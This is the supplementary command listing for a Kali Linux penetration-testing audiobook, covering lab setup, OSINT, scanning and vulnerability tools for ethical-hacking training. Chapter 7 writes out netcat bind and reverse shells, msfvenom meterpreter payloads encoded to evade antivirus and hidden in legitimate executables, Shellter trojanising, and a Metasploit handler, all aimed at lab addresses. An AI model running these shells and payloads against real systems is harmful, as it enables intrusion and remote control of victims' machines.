The Ultimate Kali Linux Book - Supplementary Materials


Preface

To get the most out of this audiobook


To get the most out of this audiobook, it's recommended to have a solid foundation in networking, such as an understanding of the common network and application protocols of the TCP/IP suite, IP addressing, routing and switching concepts, and the roles and functions of networking devices and security appliances. Knowing virtualization technologies such as hypervisors and their components will be beneficial, as most labs are built within a virtualized environment to reduce the need to purchase additional systems.
All labs and exercises were built on a system running Windows 10 Home as the host operating system, with a multicore processor with virtualization enabled, 16 GB of RAM, and 300 GB of free storage for the virtual machines. A dedicated GPU is needed to perform password cracking with a GPU-based tool, and two wireless network adapters that support packet injection and operate at 2.4 and 5 GHz are also required.
Oracle VM VirtualBox was the preferred choice of hypervisor as it provides better virtual networking capabilities than other solutions. However, if you prefer to use another hypervisor product such as VMware, you are free to do so, but please keep in mind that all labs within this audiobook were completed and tested using Oracle VM VirtualBox.

Note
While the content and labs found within this audiobook are based on Kali Linux 2021,
the concepts and exercises are applicable to later versions of Kali Linux that will be
released in the future.

After completing this audiobook, equipped with your imagination and newfound skills,
attempt to create additional lab scenarios and even extend your lab environment by
adding additional virtual machines to improve your skillset. This will help you to
continue learning and further develop your skills as an aspiring ethical hacker and
penetration tester.

Download the images, links, tables, and code and commands
Packt audiobooks have been selected for a seamless audio experience. Some topics,
however, do come with elements like images, links, tables, and code that aren't natural
for this medium. We've made minor changes to the content of the audiobooks so that
you can listen to the audio without needing to refer to these visual elements unless
necessary. To give you the choice between listening to just the audio and listening to
the audio while following the example code and GUI steps, we've created a PDF that
contains all the elements you need to achieve the goals of this audiobook. All references
to images and code in the audiobook can be found within this PDF. You can download
the PDF from github.com/PacktPublishing/The-Ultimate-Kali-Linux-Book-Audiobook
Chapter 1

Figure 1.1 – Penetration testing phases

Figure 1.2 – Pre-engagement


Figure 1.3 – Hacking phases

Figure 1.4 – Cyber Kill Chain


Figure 1.5 – USB ninja cable

Figure 1.6 – USB rubber ducky

Figure 1.7 – C2 operations


Further reading
To learn more on the subject, check out the following links:
• Understanding network port numbers: https://hub.packtpub.com/understanding-network-port-numbers-tcp-udp-and-icmp-on-an-operating-system/
• Vulnerabilities in the Application and Transport Layer of the TCP/IP stack: https://hub.packtpub.com/vulnerabilities-in-the-application-and-transport-layer-of-the-tcp-ip-stack/
• Understanding IP address spaces: https://hub.packtpub.com/understanding-address-spaces-and-subnetting-in-ipv4-tutorial/
• The Cyber Kill Chain: https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html
Chapter 2
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
• Oracle VM VirtualBox: https://www.virtualbox.org/wiki/Downloads
• Oracle VM VirtualBox Extension Pack: https://www.virtualbox.org/wiki/Downloads
• Vagrant: https://www.vagrantup.com/downloads
• Kali Linux 2021.2: https://www.kali.org/get-kali/
• OWASP Juice Shop: https://owasp.org/www-project-juice-shop/
• Metasploitable 2: https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
• Metasploitable 3: https://app.vagrantup.com/rapid7/boxes/metasploitable3-win2k8
• OWASP Broken Web Applications: https://sourceforge.net/projects/owaspbwa/files/
Images

Figure 2.1 – Lab topology

Figure 2.2 – VirtualBox download page


Figure 2.3 – VirtualBox extension pack

Figure 2.4 – Kali Linux virtual image


Figure 2.5 – Downloading Kali Linux

Figure 2.6 – Importing Kali Linux


Figure 2.7 – Starting the import process

Figure 2.8 – Enabling nested virtualization on the virtual machine

Figure 2.9 – Accessing the settings


Figure 2.10 – Adjusting Base Memory

Figure 2.11 – Internet assigned network adapter


Figure 2.12 – Adding the PentestNet adapter

Figure 2.13 – Assigning the Red Team network


Figure 2.14 – Logon window on Kali Linux

Figure 2.15 – List of tools on Kali Linux


Figure 2.16 – Checking the IP address of the network adapter

Figure 2.17 – Testing internet connectivity


Figure 2.18 – Updating the source lists

Figure 2.19 – Upgrading packages on Kali Linux


Figure 2.20 – Creating a virtual machine

Figure 2.21 – Hard Disk Selector


Figure 2.22 – Attaching a virtual hard drive
Figure 2.23 – Network adapter configurations

Figure 2.24 – Verifying network connectivity

Figure 2.25 – Installing Vagrant plugins


Figure 2.26 – Selecting the preferred hypervisor

Figure 2.27 – Metasploitable 3 download status


Figure 2.28 – Metasploitable 3 networking settings
Figure 2.29 – Dual-homed network connection

Figure 2.30 – Choosing a provider


Figure 2.31 – Connecting to the HiddenNet virtual network

Figure 2.32 – Installing Docker PGP keys


Figure 2.33 – Configuring the Docker repository

Figure 2.34 – Installing Docker on Kali Linux


Figure 2.35 – OWASP Juice Shop Docker container

Figure 2.36 – Starting the OWASP Juice Shop Docker container


Figure 2.37 – OWASP Juice Shop user interface

Figure 2.38 – OWASP BWA virtual machine


Figure 2.39 – Selecting the virtual disk file

Figure 2.40 – Network adapter configurations


Figure 2.41 – Verifying network connectivity

Code and Commands

C:\> cd C:\Program Files\Oracle\VirtualBox
C:\Program Files\Oracle\VirtualBox> vboxmanage dhcpserver add --network=PentestNet --server-ip=172.30.1.1 --lower-ip=172.30.1.20 --upper-ip=172.30.1.50 --netmask=255.255.255.0 --enable
Command 2.1

C:\> cd C:\Program Files\Oracle\VirtualBox
C:\Program Files\Oracle\VirtualBox> vboxmanage dhcpserver add --network=HiddenNet --server-ip=10.11.12.1 --lower-ip=10.11.12.20 --upper-ip=10.11.12.50 --netmask=255.255.255.0 --enable
Command 2.2

C:\> cd C:\Program Files\Oracle\VirtualBox
C:\Program Files\Oracle\VirtualBox> vboxmanage dhcpserver add --network=RedTeamLab --server-ip=192.168.42.1 --lower-ip=192.168.42.20 --upper-ip=192.168.42.50 --netmask=255.255.255.0 --enable
Command 2.3

C:\> cd C:\Program Files\Oracle\VirtualBox
C:\Program Files\Oracle\VirtualBox> VBoxManage.exe list vms
Command 2.4

C:\Program Files\Oracle\VirtualBox> VBoxManage.exe modifyvm "VM Name" --nested-hw-virt on
Command 2.5

C:\Users\Slayer> vagrant plugin install vagrant-reload
C:\Users\Slayer> vagrant plugin install vagrant-vbguest
Command 2.6

C:\Users\Slayer> vagrant box add rapid7/metasploitable3-win2k8
Command 2.7

C:\Users\Slayer> cd .vagrant.d\boxes
C:\Users\Slayer\.vagrant.d\boxes> vagrant init metasploitable3-win2k8
C:\Users\Slayer\.vagrant.d\boxes> vagrant up
Command 2.8

C:\Users\Slayer> vagrant box add rapid7/metasploitable3-ub1404
Command 2.9

C:\Users\Slayer> cd .vagrant.d
C:\Users\Slayer\.vagrant.d> del Vagrantfile
C:\Users\Slayer\.vagrant.d> vagrant init metasploitable3-ub1404
C:\Users\Slayer\.vagrant.d> vagrant up
Command 2.10

curl -fsSL https://download.docker.com/linux/debian/gpg | gpg --dearmor | sudo tee /usr/share/keyrings/docker-archive-keyring.gpg >/dev/null
Command 2.11

echo 'deb [arch=amd64 signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/debian buster stable' | sudo tee /etc/apt/sources.list.d/docker.list
Command 2.12

sudo apt-get update
Command 2.13

sudo apt install -y docker-ce docker-ce-cli containerd.io
Command 2.14

sudo docker pull bkimminich/juice-shop
Command 2.15

sudo docker run --rm -p 3000:3000 bkimminich/juice-shop
Command 2.16

Further reading
To learn more on the topics that were covered in this chapter, take a look at the following resources:
• Why secure web-based applications? https://hub.packtpub.com/why-secure-web-based-applications-with-kali-linux/
• Kali Linux 2021.2 release information: https://www.kali.org/blog/kali-linux-2021-2-release/
Chapter 3
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
• Oracle VM VirtualBox: https://www.virtualbox.org/
• Windows Server 2019: https://www.microsoft.com/en-us/evalcenter/evaluate-windows-server-2019
• Windows 10 Enterprise: https://www.microsoft.com/en-us/evalcenter/evaluate-windows-10-enterprise
• Ubuntu Server 20.04.2: https://ubuntu.com/download/server
• FreeRadius: https://freeradius.org/
• A physical wireless router that supports the WEP, WPA2-Personal, and WPA2-Enterprise security standards
Images

Figure 3.1 – Windows red teaming lab topology

Figure 3.2 – User accounts


Figure 3.3 – Windows Setup

Figure 3.4 – VirtualBox Guest Additions


Figure 3.5 – Windows Explorer

Figure 3.6 – Windows Run application


Figure 3.7 – System Properties

Figure 3.8 – Enabling network discovery


Figure 3.9 – Turning on network discovery on Windows 10

Figure 3.10 – Server Manager


Figure 3.11 – Installation Type

Figure 3.12 – Promote this server to a domain controller

Figure 3.13 – Deployment Configuration


Figure 3.14 – Logging in to the domain

Figure 3.15 – Group Policy Management

Figure 3.16 – Editing a GPO

Figure 3.17 – Disabling antimalware protection

Figure 3.18 – Verifying shared folders

Figure 3.19 – Creating an SPN on Windows Server


Figure 3.20 – Sign-in window

Figure 3.21 – Wireless penetration testing lab


Figure 3.23 – Creating a virtual hard disk

Figure 3.24 – Configuring network settings


Figure 3.25 – Attaching a bootable disk

Figure 3.26 – FreeRadius files


Figure 3.27 – Creating a user account

Figure 3.28 – Creating an AAA client account


Figure 3.29 – Verifying the FreeRadius service's status

Figure 3.30 – Verifying RADIUS open ports

Figure 3.31 – Changing the wireless network's name


Figure 3.32 – Configuring wireless security

Code and Commands

C:\Users\Administrator> net user bob Password1 /add /domain
C:\Users\Administrator> net user alice Password1 /add /domain
C:\Users\Administrator> net user johndoe Password123 /add /domain
C:\Users\Administrator> net user sqladmin Password45 /add /domain
Command 3.1

C:\Users\Administrator> net localgroup "Administrators" johndoe /add
C:\Users\Administrator> net group "Domain Admins" johndoe /add /domain
C:\Users\Administrator> net group "Enterprise Admins" johndoe /add /domain
C:\Users\Administrator> net group "Group Policy Creator Owners" johndoe /add /domain
C:\Users\Administrator> net group "Schema Admins" johndoe /add /domain
Command 3.2

C:\Users\Administrator> net localgroup "Administrators" sqladmin /add
C:\Users\Administrator> net group "Domain Admins" sqladmin /add /domain
C:\Users\Administrator> net group "Enterprise Admins" sqladmin /add /domain
C:\Users\Administrator> net group "Group Policy Creator Owners" sqladmin /add /domain
C:\Users\Administrator> net group "Schema Admins" sqladmin /add /domain
Command 3.3

C:\Users\Administrator> cd\
C:\> mkdir CorporateFileShare
C:\> net share DataShare=c:\CorporateFileShare
Command 3.4

C:\Users\Administrator> setspn -a DC1/sqladmin.REDTEAMLAB.local:64123 REDTEAMLAB\sqladmin
Command 3.5

C:\Windows\system32> netsh interface ip add dns "Ethernet" 192.168.42.22
Command 3.6

C:\Windows\system32> powershell
PS C:\Windows\system32> Add-Computer -DomainName RedTeamLab.local -Restart
Command 3.7

C:\Users\Administrator> net localgroup "Administrators" redteamlab\bob /ADD
C:\Users\Administrator> net localgroup "Administrators" redteamlab\alice /ADD
Command 3.8

C:\Users\Administrator> cd \
C:\> mkdir SharedData
C:\> net share DataShare=c:\SharedData
Command 3.9

glen@freeradius:~$ sudo apt update
glen@freeradius:~$ sudo apt install freeradius
Command 3.10

glen@freeradius:~$ sudo ls -l /etc/freeradius/
Command 3.11

glen@freeradius:~$ sudo ls -l /etc/freeradius/3.0
Command 3.12

glen@freeradius:~$ sudo vi /etc/freeradius/3.0/users
Command 3.13

bob Cleartext-Password := "password123"
Code 3.1

glen@freeradius:~$ sudo vi /etc/freeradius/3.0/clients.conf
Command 3.14

client 172.16.17.199 {
    secret = radiuspassword1
    shortname = CorpAP
}
Code 3.2

glen@freeradius:~$ sudo systemctl restart freeradius
glen@freeradius:~$ sudo systemctl status freeradius
Command 3.15

Further reading
To learn more about the topics that were covered in this chapter, take a look at the following resources:
• Active Directory Domain Services: https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/get-started/virtual-dc/active-directory-domain-services-overview
• Understanding FreeRADIUS: https://freeradius.org/documentation/

Chapter 4
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
• Kali Linux 2021.2: https://www.kali.org/get-kali/
• Osintgram: https://github.com/Datalux/Osintgram
• Sherlock: https://github.com/sherlock-project/sherlock

Images

Figure 4.1 – Footprinting


Figure 4.2 – OSINT sources

Figure 4.3 – VPN servers


Figure 4.4 – Proxy chaining

Figure 4.5 – Locating the proxychains configuration file

Figure 4.6 – Editing the proxychain's configuration file


Figure 4.7 – Adding proxies

Figure 4.8 – Using proxychains

Figure 4.9 – TOR


Figure 4.10 – Setting the proxy list to use TOR only

Figure 4.11 – TOR status check

Figure 4.12 – TOR via proxychains


Figure 4.13 – WHOIS

Figure 4.14 – Job posting

Figure 4.15 – Hunter.io


Figure 4.16 – Employees' data

Figure 4.17 – Data sources


Figure 4.18 – Installing Recon-ng modules

Figure 4.19 – Displaying the modules

Figure 4.20 – Viewing workspaces


Figure 4.21 – Searching for modules

Figure 4.22 – Viewing the required parameters


Figure 4.23 – Executing a module

Figure 4.24 – Searching a module

Figure 4.25 – Viewing hosts


Figure 4.26 – Viewing contact details

Figure 4.27 – Activity summary

Figure 4.28 – Summary of collected data


Figure 4.29 – Reporting modules

Figure 4.30 – Generating a report


Figure 4.31 – HTML report

Figure 4.32 – Recon-ng web user interface


Figure 4.33 – Subdomains

Figure 4.34 – Adding user credentials

Figure 4.35 – Collecting information

Figure 4.36 – Collected data


Figure 4.37 – Sherlock

Figure 4.38 – Viewing the collected data

Figure 4.39 – Searching for a specific operating system


Figure 4.40 – Discovering open ports

Figure 4.41 – Web technologies and vulnerabilities


Figure 4.42 – Discovering running services

Figure 4.43 – Censys results


Figure 4.44 – Opening Maltego

Figure 4.45 – Maltego – Production Selection page


Figure 4.46 – Maltego's user interface

Figure 4.47 – Discovering mail servers


Figure 4.48 – Gathering the IP addresses of assets

Figure 4.49 – Gathering name servers


Figure 4.50 – Discovering web links on the target's website

Figure 4.51 – Discovering email addresses


Figure 4.52 – Netcraft

Figure 4.53 – Netcraft results

Figure 4.54 – Hosting history


Figure 4.55 – Server- and client-side technologies

Code and Commands

kali@kali:~$ sudo vi /etc/proxychains4.conf
Command 4.1

kali@kali:~$ sudo apt update
kali@kali:~$ sudo apt install tor
Command 4.2

kali@kali:~$ sudo vi /etc/proxychains4.conf
Command 4.3

kali@kali:~$ proxychains4 firefox
Command 4.4

[recon-ng][default] > marketplace install all
Command 4.5

[recon-ng][default] > workspaces create pentest1
Command 4.6

[recon-ng][pentest1][whois_pocs] > options set SOURCE microsoft.com
Command 4.7

[recon-ng][pentest1] > modules load recon/domains-hosts/bing_domain_web
[recon-ng][pentest1][bing_domain_web] > info
Command 4.8

[recon-ng][pentest1] > modules load reporting/html
[recon-ng][pentest1] > info
[recon-ng][pentest1][html] > options set CREATOR Glen
[recon-ng][pentest1][html] > options set CUSTOMER MS-Target
[recon-ng][pentest1][html] > options set FILENAME /home/kali/PenTest1-Report.html
[recon-ng][pentest1][html] > run
Command 4.9

kali@kali:~$ recon-web
Command 4.10

kali@kali:~$ theHarvester -h
Command 4.11

kali@kali:~$ theHarvester -d microsoft.com --dns-server 8.8.8.8 -b linkedin
Command 4.12

kali@kali:~$ theHarvester -d microsoft.com -b bing
Command 4.13

kali@kali:~$ git clone https://github.com/Datalux/Osintgram.git
kali@kali:~$ sudo apt-get install python3-venv
Command 4.14

kali@kali:~$ cd Osintgram
kali@kali:~/Osintgram$ sudo python3 -m venv venv
kali@kali:~/Osintgram$ source venv/bin/activate
(venv)kali@kali:~/Osintgram$ sudo pip3 install -r requirements.txt
Command 4.15

(venv)kali@kali:~/Osintgram$ make setup
Command 4.16

(venv)kali@kali:~/Osintgram$ sudo python3 main.py microsoft
Command 4.17

kali@kali:~$ sudo apt update
kali@kali:~$ git clone https://github.com/sherlock-project/sherlock.git
Command 4.18

kali@kali:~$ cd sherlock
kali@kali:~/sherlock$ python3 -m pip install -r requirements.txt
Command 4.19

kali@kali:~/sherlock$ python3 sherlock microsoft --timeout 5
Command 4.20

Further reading
To learn more about open source intelligence, please go to https://hub.packtpub.com/open-source-intelligence/.
Chapter 5
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
• Kali Linux 2021.2: https://www.kali.org/get-kali/
• Metasploitable 2: https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
• OWASP Broken Web Applications: https://sourceforge.net/projects/owaspbwa/files/
• S3Scanner: https://github.com/sa7mon/S3Scanner

Images

Figure 5.1 – Filtering results from a domain


Figure 5.2 – Keyword search

Figure 5.3 – Including multiple keywords


Figure 5.4 – Filtering by file types

Figure 5.5 – Filtering by specific URLs


Figure 5.6 – Filtering by specific keywords

Figure 5.7 – Google's Advanced search menu


Figure 5.8 – Advanced search parameters

Figure 5.9 – Google Hacking Database


Figure 5.10 – DNS query

Figure 5.11 – DNS response


Figure 5.12 – Client establishing a connection

Figure 5.13 – DNS enumeration


Figure 5.14 – Gathering DNS records

Figure 5.15 – Retrieving name servers

Figure 5.16 – Retrieving DNS records


Figure 5.17 – Zone transfer using DNSEnum

Figure 5.18 – DNS records

Figure 5.19 – Checking an IP address


Figure 5.20 – Spiderfoot web interface

Figure 5.21 – Sources

Figure 5.22 – New Scan


Figure 5.23 – Setting a target

Figure 5.24 – Spiderfoot use cases


Figure 5.25 – Spiderfoot graph

Figure 5.26 – Viewing data


Figure 5.27 – Source data elements

Figure 5.28 – Discovering subdomains


Figure 5.29 – Output file

Figure 5.30 – Screenshots

Figure 5.31 – Network-based firewall


Figure 5.32 – Checking network interfaces

Figure 5.33 – MAC Changer options

Figure 5.34 – Changing MAC address


Figure 5.35 – Checking your network

Figure 5.36 – Netdiscover host discovery

Figure 5.37 – Ping sweep using Nmap


Figure 5.38 – Discovering open ports

Figure 5.39 – Advanced scan results


Figure 5.40 – Operating system profiling

Figure 5.41 – Decoys


Figure 5.42 – TCP 3-way handshake

Figure 5.44 – Stealth scanning using Nmap

Figure 5.45 – Wireshark capture

Figure 5.46 – Searching the port scanning modules


Figure 5.47 – Viewing options

Figure 5.48 – TCP SYN scan

Figure 5.49 – Searching for modules

Figure 5.50 – Viewing module options


Figure 5.51 – Enumerating SMB

Figure 5.52 – Discovering shared drives

Figure 5.53 – Displaying the contents of a shared drive

Figure 5.54 – SSH version checker module


Figure 5.55 – Office 365 login page

Figure 5.57 – Found a valid user account


Figure 5.58 – S3Scanner options

Figure 5.59 – Obtaining an IP address

Figure 5.60 – Discovering an AWS S3 bucket


Figure 5.61 – Scanning with S3Scanner

Figure 5.62 – Viewing the files within an S3 bucket

Figure 5.63 – Downloading the necessary content

Figure 5.64 – Viewing the local files


Code and Commands

kali@kali:~$ dnsrecon -h
Command 5.1

kali@kali:~$ host -l zonetransfer.me nsztm1.digi.ninja
Command 5.2

kali@kali:~$ dnsenum zonetransfer.me
Command 5.3

kali@kali:~$ sudo spiderfoot -l 172.16.17.71:80
Command 5.4

kali@kali:~$ sudo apt update
kali@kali:~$ sudo apt install dnsmap
Command 5.5

kali@kali:~$ dnsmap microsoft.com
Command 5.6

kali@kali:~$ sudo apt update
kali@kali:~$ sudo apt install sublist3r
Command 5.7

kali@kali:~$ sublist3r -d microsoft.com
Command 5.8

kali@kali:~$ sublist3r -d microsoft.com -o subdomains.txt
Command 5.9

kali@kali:~$ git clone https://github.com/FortyNorthSecurity/EyeWitness
Command 5.10

kali@kali:~$ cd EyeWitness/Python/setup
kali@kali:~/EyeWitness/Python/setup$ sudo ./setup.sh
Command 5.11

kali@kali:~/EyeWitness/Python/setup$ cd ..
Command 5.12

kali@kali:~/EyeWitness/Python$ ./EyeWitness.py --web -f /home/kali/subdomains.txt -d /home/kali/screenshots --prepend-https
Command 5.13

kali@kali:~$ sudo ifconfig eth0 down
Command 5.14

kali@kali:~$ sudo macchanger -A eth0
Command 5.15

kali@kali:~$ sudo ifconfig eth0 up
Command 5.16

kali@kali:~$ sudo netdiscover -r 172.30.1.0/24
Command 5.17

kali@kali:~$ nmap -sn 172.30.1.0/24 --exclude 172.30.1.27
Command 5.18

kali@kali:~$ nmap 172.30.1.26
Command 5.19

kali@kali:~$ nmap -A -T4 -p- 172.30.1.26
Command 5.20

kali@kali:~$ nmap 172.30.1.26 -D 172.30.1.20,172.30.1.21,172.30.1.22
Command 5.21

kali@kali:~$ nmap --spoof-mac 0 172.30.1.26
Command 5.22

kali@kali:~$ sudo nmap -S 172.30.1.23 -e eth0 172.30.1.26
Command 5.23

kali@kali:~$ sudo nmap -sS -p80 172.30.1.26
Command 5.24

kali@kali:~$ sudo msfconsole
Command 5.25

msf6 > search portscan
Command 5.26

msf6 > use auxiliary/scanner/portscan/syn
msf6 auxiliary(scanner/portscan/syn) > options
Command 5.27

msf6 auxiliary(scanner/portscan/syn) > set RHOSTS 172.30.1.26
msf6 auxiliary(scanner/portscan/syn) > run
Command 5.28

kali@kali:~$ msfconsole
Command 5.29

msf6 > search smb_version
Command 5.30

msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > options
Command 5.31

msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 172.30.1.26
msf6 auxiliary(scanner/smb/smb_version) > run
Command 5.32

kali@kali:~$ smbmap -H 172.30.1.26
Command 5.33

kali@kali:~$ smbmap -H 172.30.1.26 -r tmp
Command 5.34

kali@kali:~$ sudo msfconsole
Command 5.35

msf6 > use auxiliary/scanner/ssh/ssh_version
msf6 auxiliary(scanner/ssh/ssh_version) > options
Command 5.36

msf6 auxiliary(scanner/ssh/ssh_version) > set RHOSTS 172.30.1.26
msf6 auxiliary(scanner/ssh/ssh_version) > run
Command 5.37

[+] 172.30.1.26:22 - SSH server version: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1 ( service.version=4.7p1 openssh.comment=Debian-8ubuntu1 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:4.7p1 os.vendor=Ubuntu os.family=Linux os.product=Linux os.version=8.04 os.cpe23=cpe:/o:canonical:ubuntu_linux:8.04 service.protocol=ssh fingerprint_db=ssh.banner )
Command 5.38

kali@kali:~$ sudo pip3 install s3scanner
Command 5.40

kali@kali:~$ aws configure
Command 5.41

kali@kali:~$ nslookup
> flaws.cloud
Command 5.42

> set type=ptr
> 52.218.228.98
Command 5.43

kali@kali:~$ s3scanner scan --bucket flaws.cloud
Command 5.44

kali@kali:~$ aws s3 ls s3://flaws.cloud/ --region us-west-2 --no-sign-request
Command 5.45

kali@kali:~$ mkdir S3_Bucket
kali@kali:~$ s3scanner dump --bucket flaws.cloud --dump-dir /home/kali/S3_Bucket/
Command 5.46

kali@kali:~$ cd S3_Bucket
kali@kali:~/S3_Bucket$ ls -l
Command 5.47

kali@kali:~/S3_Bucket$ cat secret-dd02c7c.html
Command 5.48

Further reading
To learn more about what was covered in this chapter, take a look at the following resources:
• Why is DNSSEC important?: https://www.icann.org/resources/pages/dnssec-what-is-it-why-important-2019-03-05-en
• DNS Zone Transfer Protocol: https://datatracker.ietf.org/doc/html/rfc5936
• Nmap reference guide: https://nmap.org/book/man.html
• Information gathering with Metasploit: https://www.offensive-security.com/metasploit-unleashed/information-gathering/
• Amazon S3 user guide: https://docs.aws.amazon.com/AmazonS3/latest/userguide/Welcome.html
• Amazon S3 Security: https://aws.amazon.com/s3/security/


Chapter 6
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
• Kali Linux 2021.2: https://www.kali.org/get-kali/
• Nessus: https://www.tenable.com/products/nessus/nessus-essentials
• Greenbone Vulnerability Manager: https://github.com/greenbone/gvmd

Images

Figure 6.1 – Nessus installer

Figure 6.2 – Changing directories


Figure 6.3 – Nessus installation process

Figure 6.4 – Web browser security warning


Figure 6.5 – Selecting the Nessus version

Figure 6.6 – Nessus activation code window


Figure 6.7 – Registering Nessus

Figure 6.8 – Creating a user account


Figure 6.9 – The New Scan button

Figure 6.10 – Scanning templates


Figure 6.11 – Scan options

Figure 6.12 – Viewing the completed scans


Figure 6.13 – Scan results

Figure 6.14 – List of security vulnerabilities


Figure 6.15 – Viewing a vulnerability's details

Figure 6.16 – The vulnerability risk factor


Figure 6.17 – Identifying vulnerability scoring metrics

Figure 6.18 – VPR scoring system


Figure 6.19 – Reporting the output

Figure 6.20 – PDF reporting options


Figure 6.21 – Executive Summary report

Figure 6.22 – Custom report


Figure 6.23 – Discovering vulnerabilities

Figure 6.24 – Searching for exploits


Figure 6.25 – Searchsploit

Figure 6.26 – Searching for an exploit module

Figure 6.27 – Displaying information about an exploit module


Figure 6.28 – Vulnerability scanning

Figure 6.29 – The GVM setup process

Figure 6.30 – User account


Figure 6.31 – Security warning

Figure 6.32 – Sign-in window


Figure 6.33 – Adding a target

Code and Commands

kali@kali:~$ cd Downloads
kali@kali:~/Downloads$ ls
Command 6.1

kali@kali:~/Downloads$ sudo dpkg -i Nessus-8.15.0-debian6_amd64.deb
Command 6.2

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Command 6.3

https://www.first.org/cvss/calculator/3.0#
Command 6.4

https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Command 6.5

kali@kali:~$ nmap --script ftp-vsftpd-backdoor 172.30.1.26
Command 6.6

kali@kali:~$ nmap --script vuln 172.30.1.26
Command 6.7

kali@kali:~$ sudo apt update
kali@kali:~$ sudo apt install gvm
Command 6.8

kali@kali:~$ sudo gvm-setup
Command 6.9
Chapter 7
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
• Kali Linux 2021.2: https://www.kali.org/get-kali/
• Shellter: https://www.shellterproject.com/
• Alfa AWUS036NHA High Gain Wireless B/G/N USB adapter
• Alfa AWUS036ACH Long-Range Dual-Band AC1200 Wireless USB 3.0 Wi-Fi adapter

Not all wireless cards support monitor mode and packet injection. Even a minor revision to a chipset can stop a card from working in monitor mode, and some cards need their drivers to be compiled manually and may not work out of the box.

Images

Figure 7.1 – Telnet packets


Figure 7.2 – Sensitive data

Figure 7.3 – Bind shell


Figure 7.4 – Reverse shell

Figure 7.5 – Determining the IP address


Figure 7.6 – Accessing the Python3 web server

Figure 7.7 – Communicating via a remote shell

Figure 7.8 – Sending and receiving a message


Figure 7.9 – Bind shell

Figure 7.10 – Verifying the connection

Figure 7.11 – Reverse shell


Figure 7.12 – Checking the payload

Figure 7.13 – Checking payload2


Figure 7.14 – Checking payload3

Figure 7.15 – Choosing the mode of operation


Figure 7.16 – Specifying the Windows executable file

Figure 7.17 – Enabling stealth mode


Figure 7.18 – Configuring the payload using Shellter

Figure 7.19 – Verification


Figure 7.20 – Threat detection rating

Figure 7.21 – Delivering the payload

Figure 7.22 – Checking the user


Figure 7.23 – Alfa AWUS036NHA wireless network adapter

Figure 7.24 – Alfa AWUS036ACH wireless network adapter


Figure 7.25 – Virtual machine settings

Figure 7.26 – Adding a USB device


Figure 7.27 – Adding a USB adapter

Figure 7.28 – Wireless network adapter


Figure 7.29 – Viewing the wireless adapter's status

Figure 7.30 – Network adapter settings


Figure 7.31 – Adding the USB wireless adapter

Figure 7.32 – Identifying the chipset


Figure 7.33 – Displaying the wireless network adapters

Figure 7.34 – Checking the wireless interfaces

Figure 7.35 – Verifying the interface's status


Figure 7.36 – Testing packet injection

Figure 7.37 – Verifying the interface's status

Figure 7.38 – Checking the adapter's status

Figure 7.39 – Terminating processes


Figure 7.40 – Enabling monitor mode

Figure 7.41 – Checking the monitor interface

Figure 7.42 – Checking the packet injection's status

Figure 7.43 – Disabling monitor mode


Figure 7.44 – Checking the interface's status

Code and Commands

kali@kali:~$ cd /usr/share/windows-binaries
kali@kali:/usr/share/windows-binaries$ python3 -m http.server 8080
Command 7.1

kali@kali:~$ nc -nlvp 1234
Command 7.2

C:\Users\Bob> nc -nv 172.30.1.29 1234
Command 7.3

kali@kali:~$ nc -nlvp 1234 -e /bin/bash
Command 7.4

C:\Users\Bob> nc -nv 172.30.1.29 1234
Command 7.5

kali@kali:~$ nc -nlvp 1234
Command 7.6

C:\Users\Bob> nc -nv 172.30.1.29 1234 -e cmd.exe
Command 7.7

kali@kali:~$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.30.1.29 LPORT=4444 -f exe -o payload.exe
Command 7.8

kali@kali:~$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.30.1.29 LPORT=4444 -f exe -o payload2.exe -e x86/shikata_ga_nai -i 9
Command 7.9

kali@kali:~$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.30.1.29 LPORT=4444 -f exe -o encoded_payload3.exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/whoami.exe
Command 7.10

kali@kali:~$ sudo apt update
kali@kali:~$ sudo apt install shellter
Command 7.11

kali@kali:~$ sudo dpkg --add-architecture i386
kali@kali:~$ sudo apt update
kali@kali:~$ sudo apt install wine32
Command 7.12

kali@kali:~$ cp /usr/share/windows-binaries/vncviewer.exe ./
Command 7.13

kali@kali:~$ sudo shellter
Command 7.14

kali@kali:~$ python3 -m http.server 8080
Command 7.15

kali@kali:~$ msfconsole
Command 7.16

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 172.30.1.29
msf6 exploit(multi/handler) > set AutoRunScript post/windows/manage/migrate
msf6 exploit(multi/handler) > exploit
Command 7.17

kali@kali:~$ sudo apt update
kali@kali:~$ sudo apt upgrade
Command 7.18

kali@kali:~$ sudo apt install realtek-rtl88xxau-dkms
Command 7.19

kali@kali:~$ git clone https://github.com/aircrack-ng/rtl8812au
Command 7.20

kali@kali:~$ cd rtl8812au
kali@kali:~/rtl8812au$ sudo make
Command 7.21

kali@kali:~/rtl8812au$ sudo make install
Command 7.22

kali@kali:~$ sudo ifconfig wlan0 down
Command 7.23

kali@kali:~$ sudo iwconfig wlan0 mode monitor
Command 7.24

kali@kali:~$ sudo ifconfig wlan0 up
Command 7.25

kali@kali:~$ sudo aireplay-ng -9 wlan0
Command 7.26

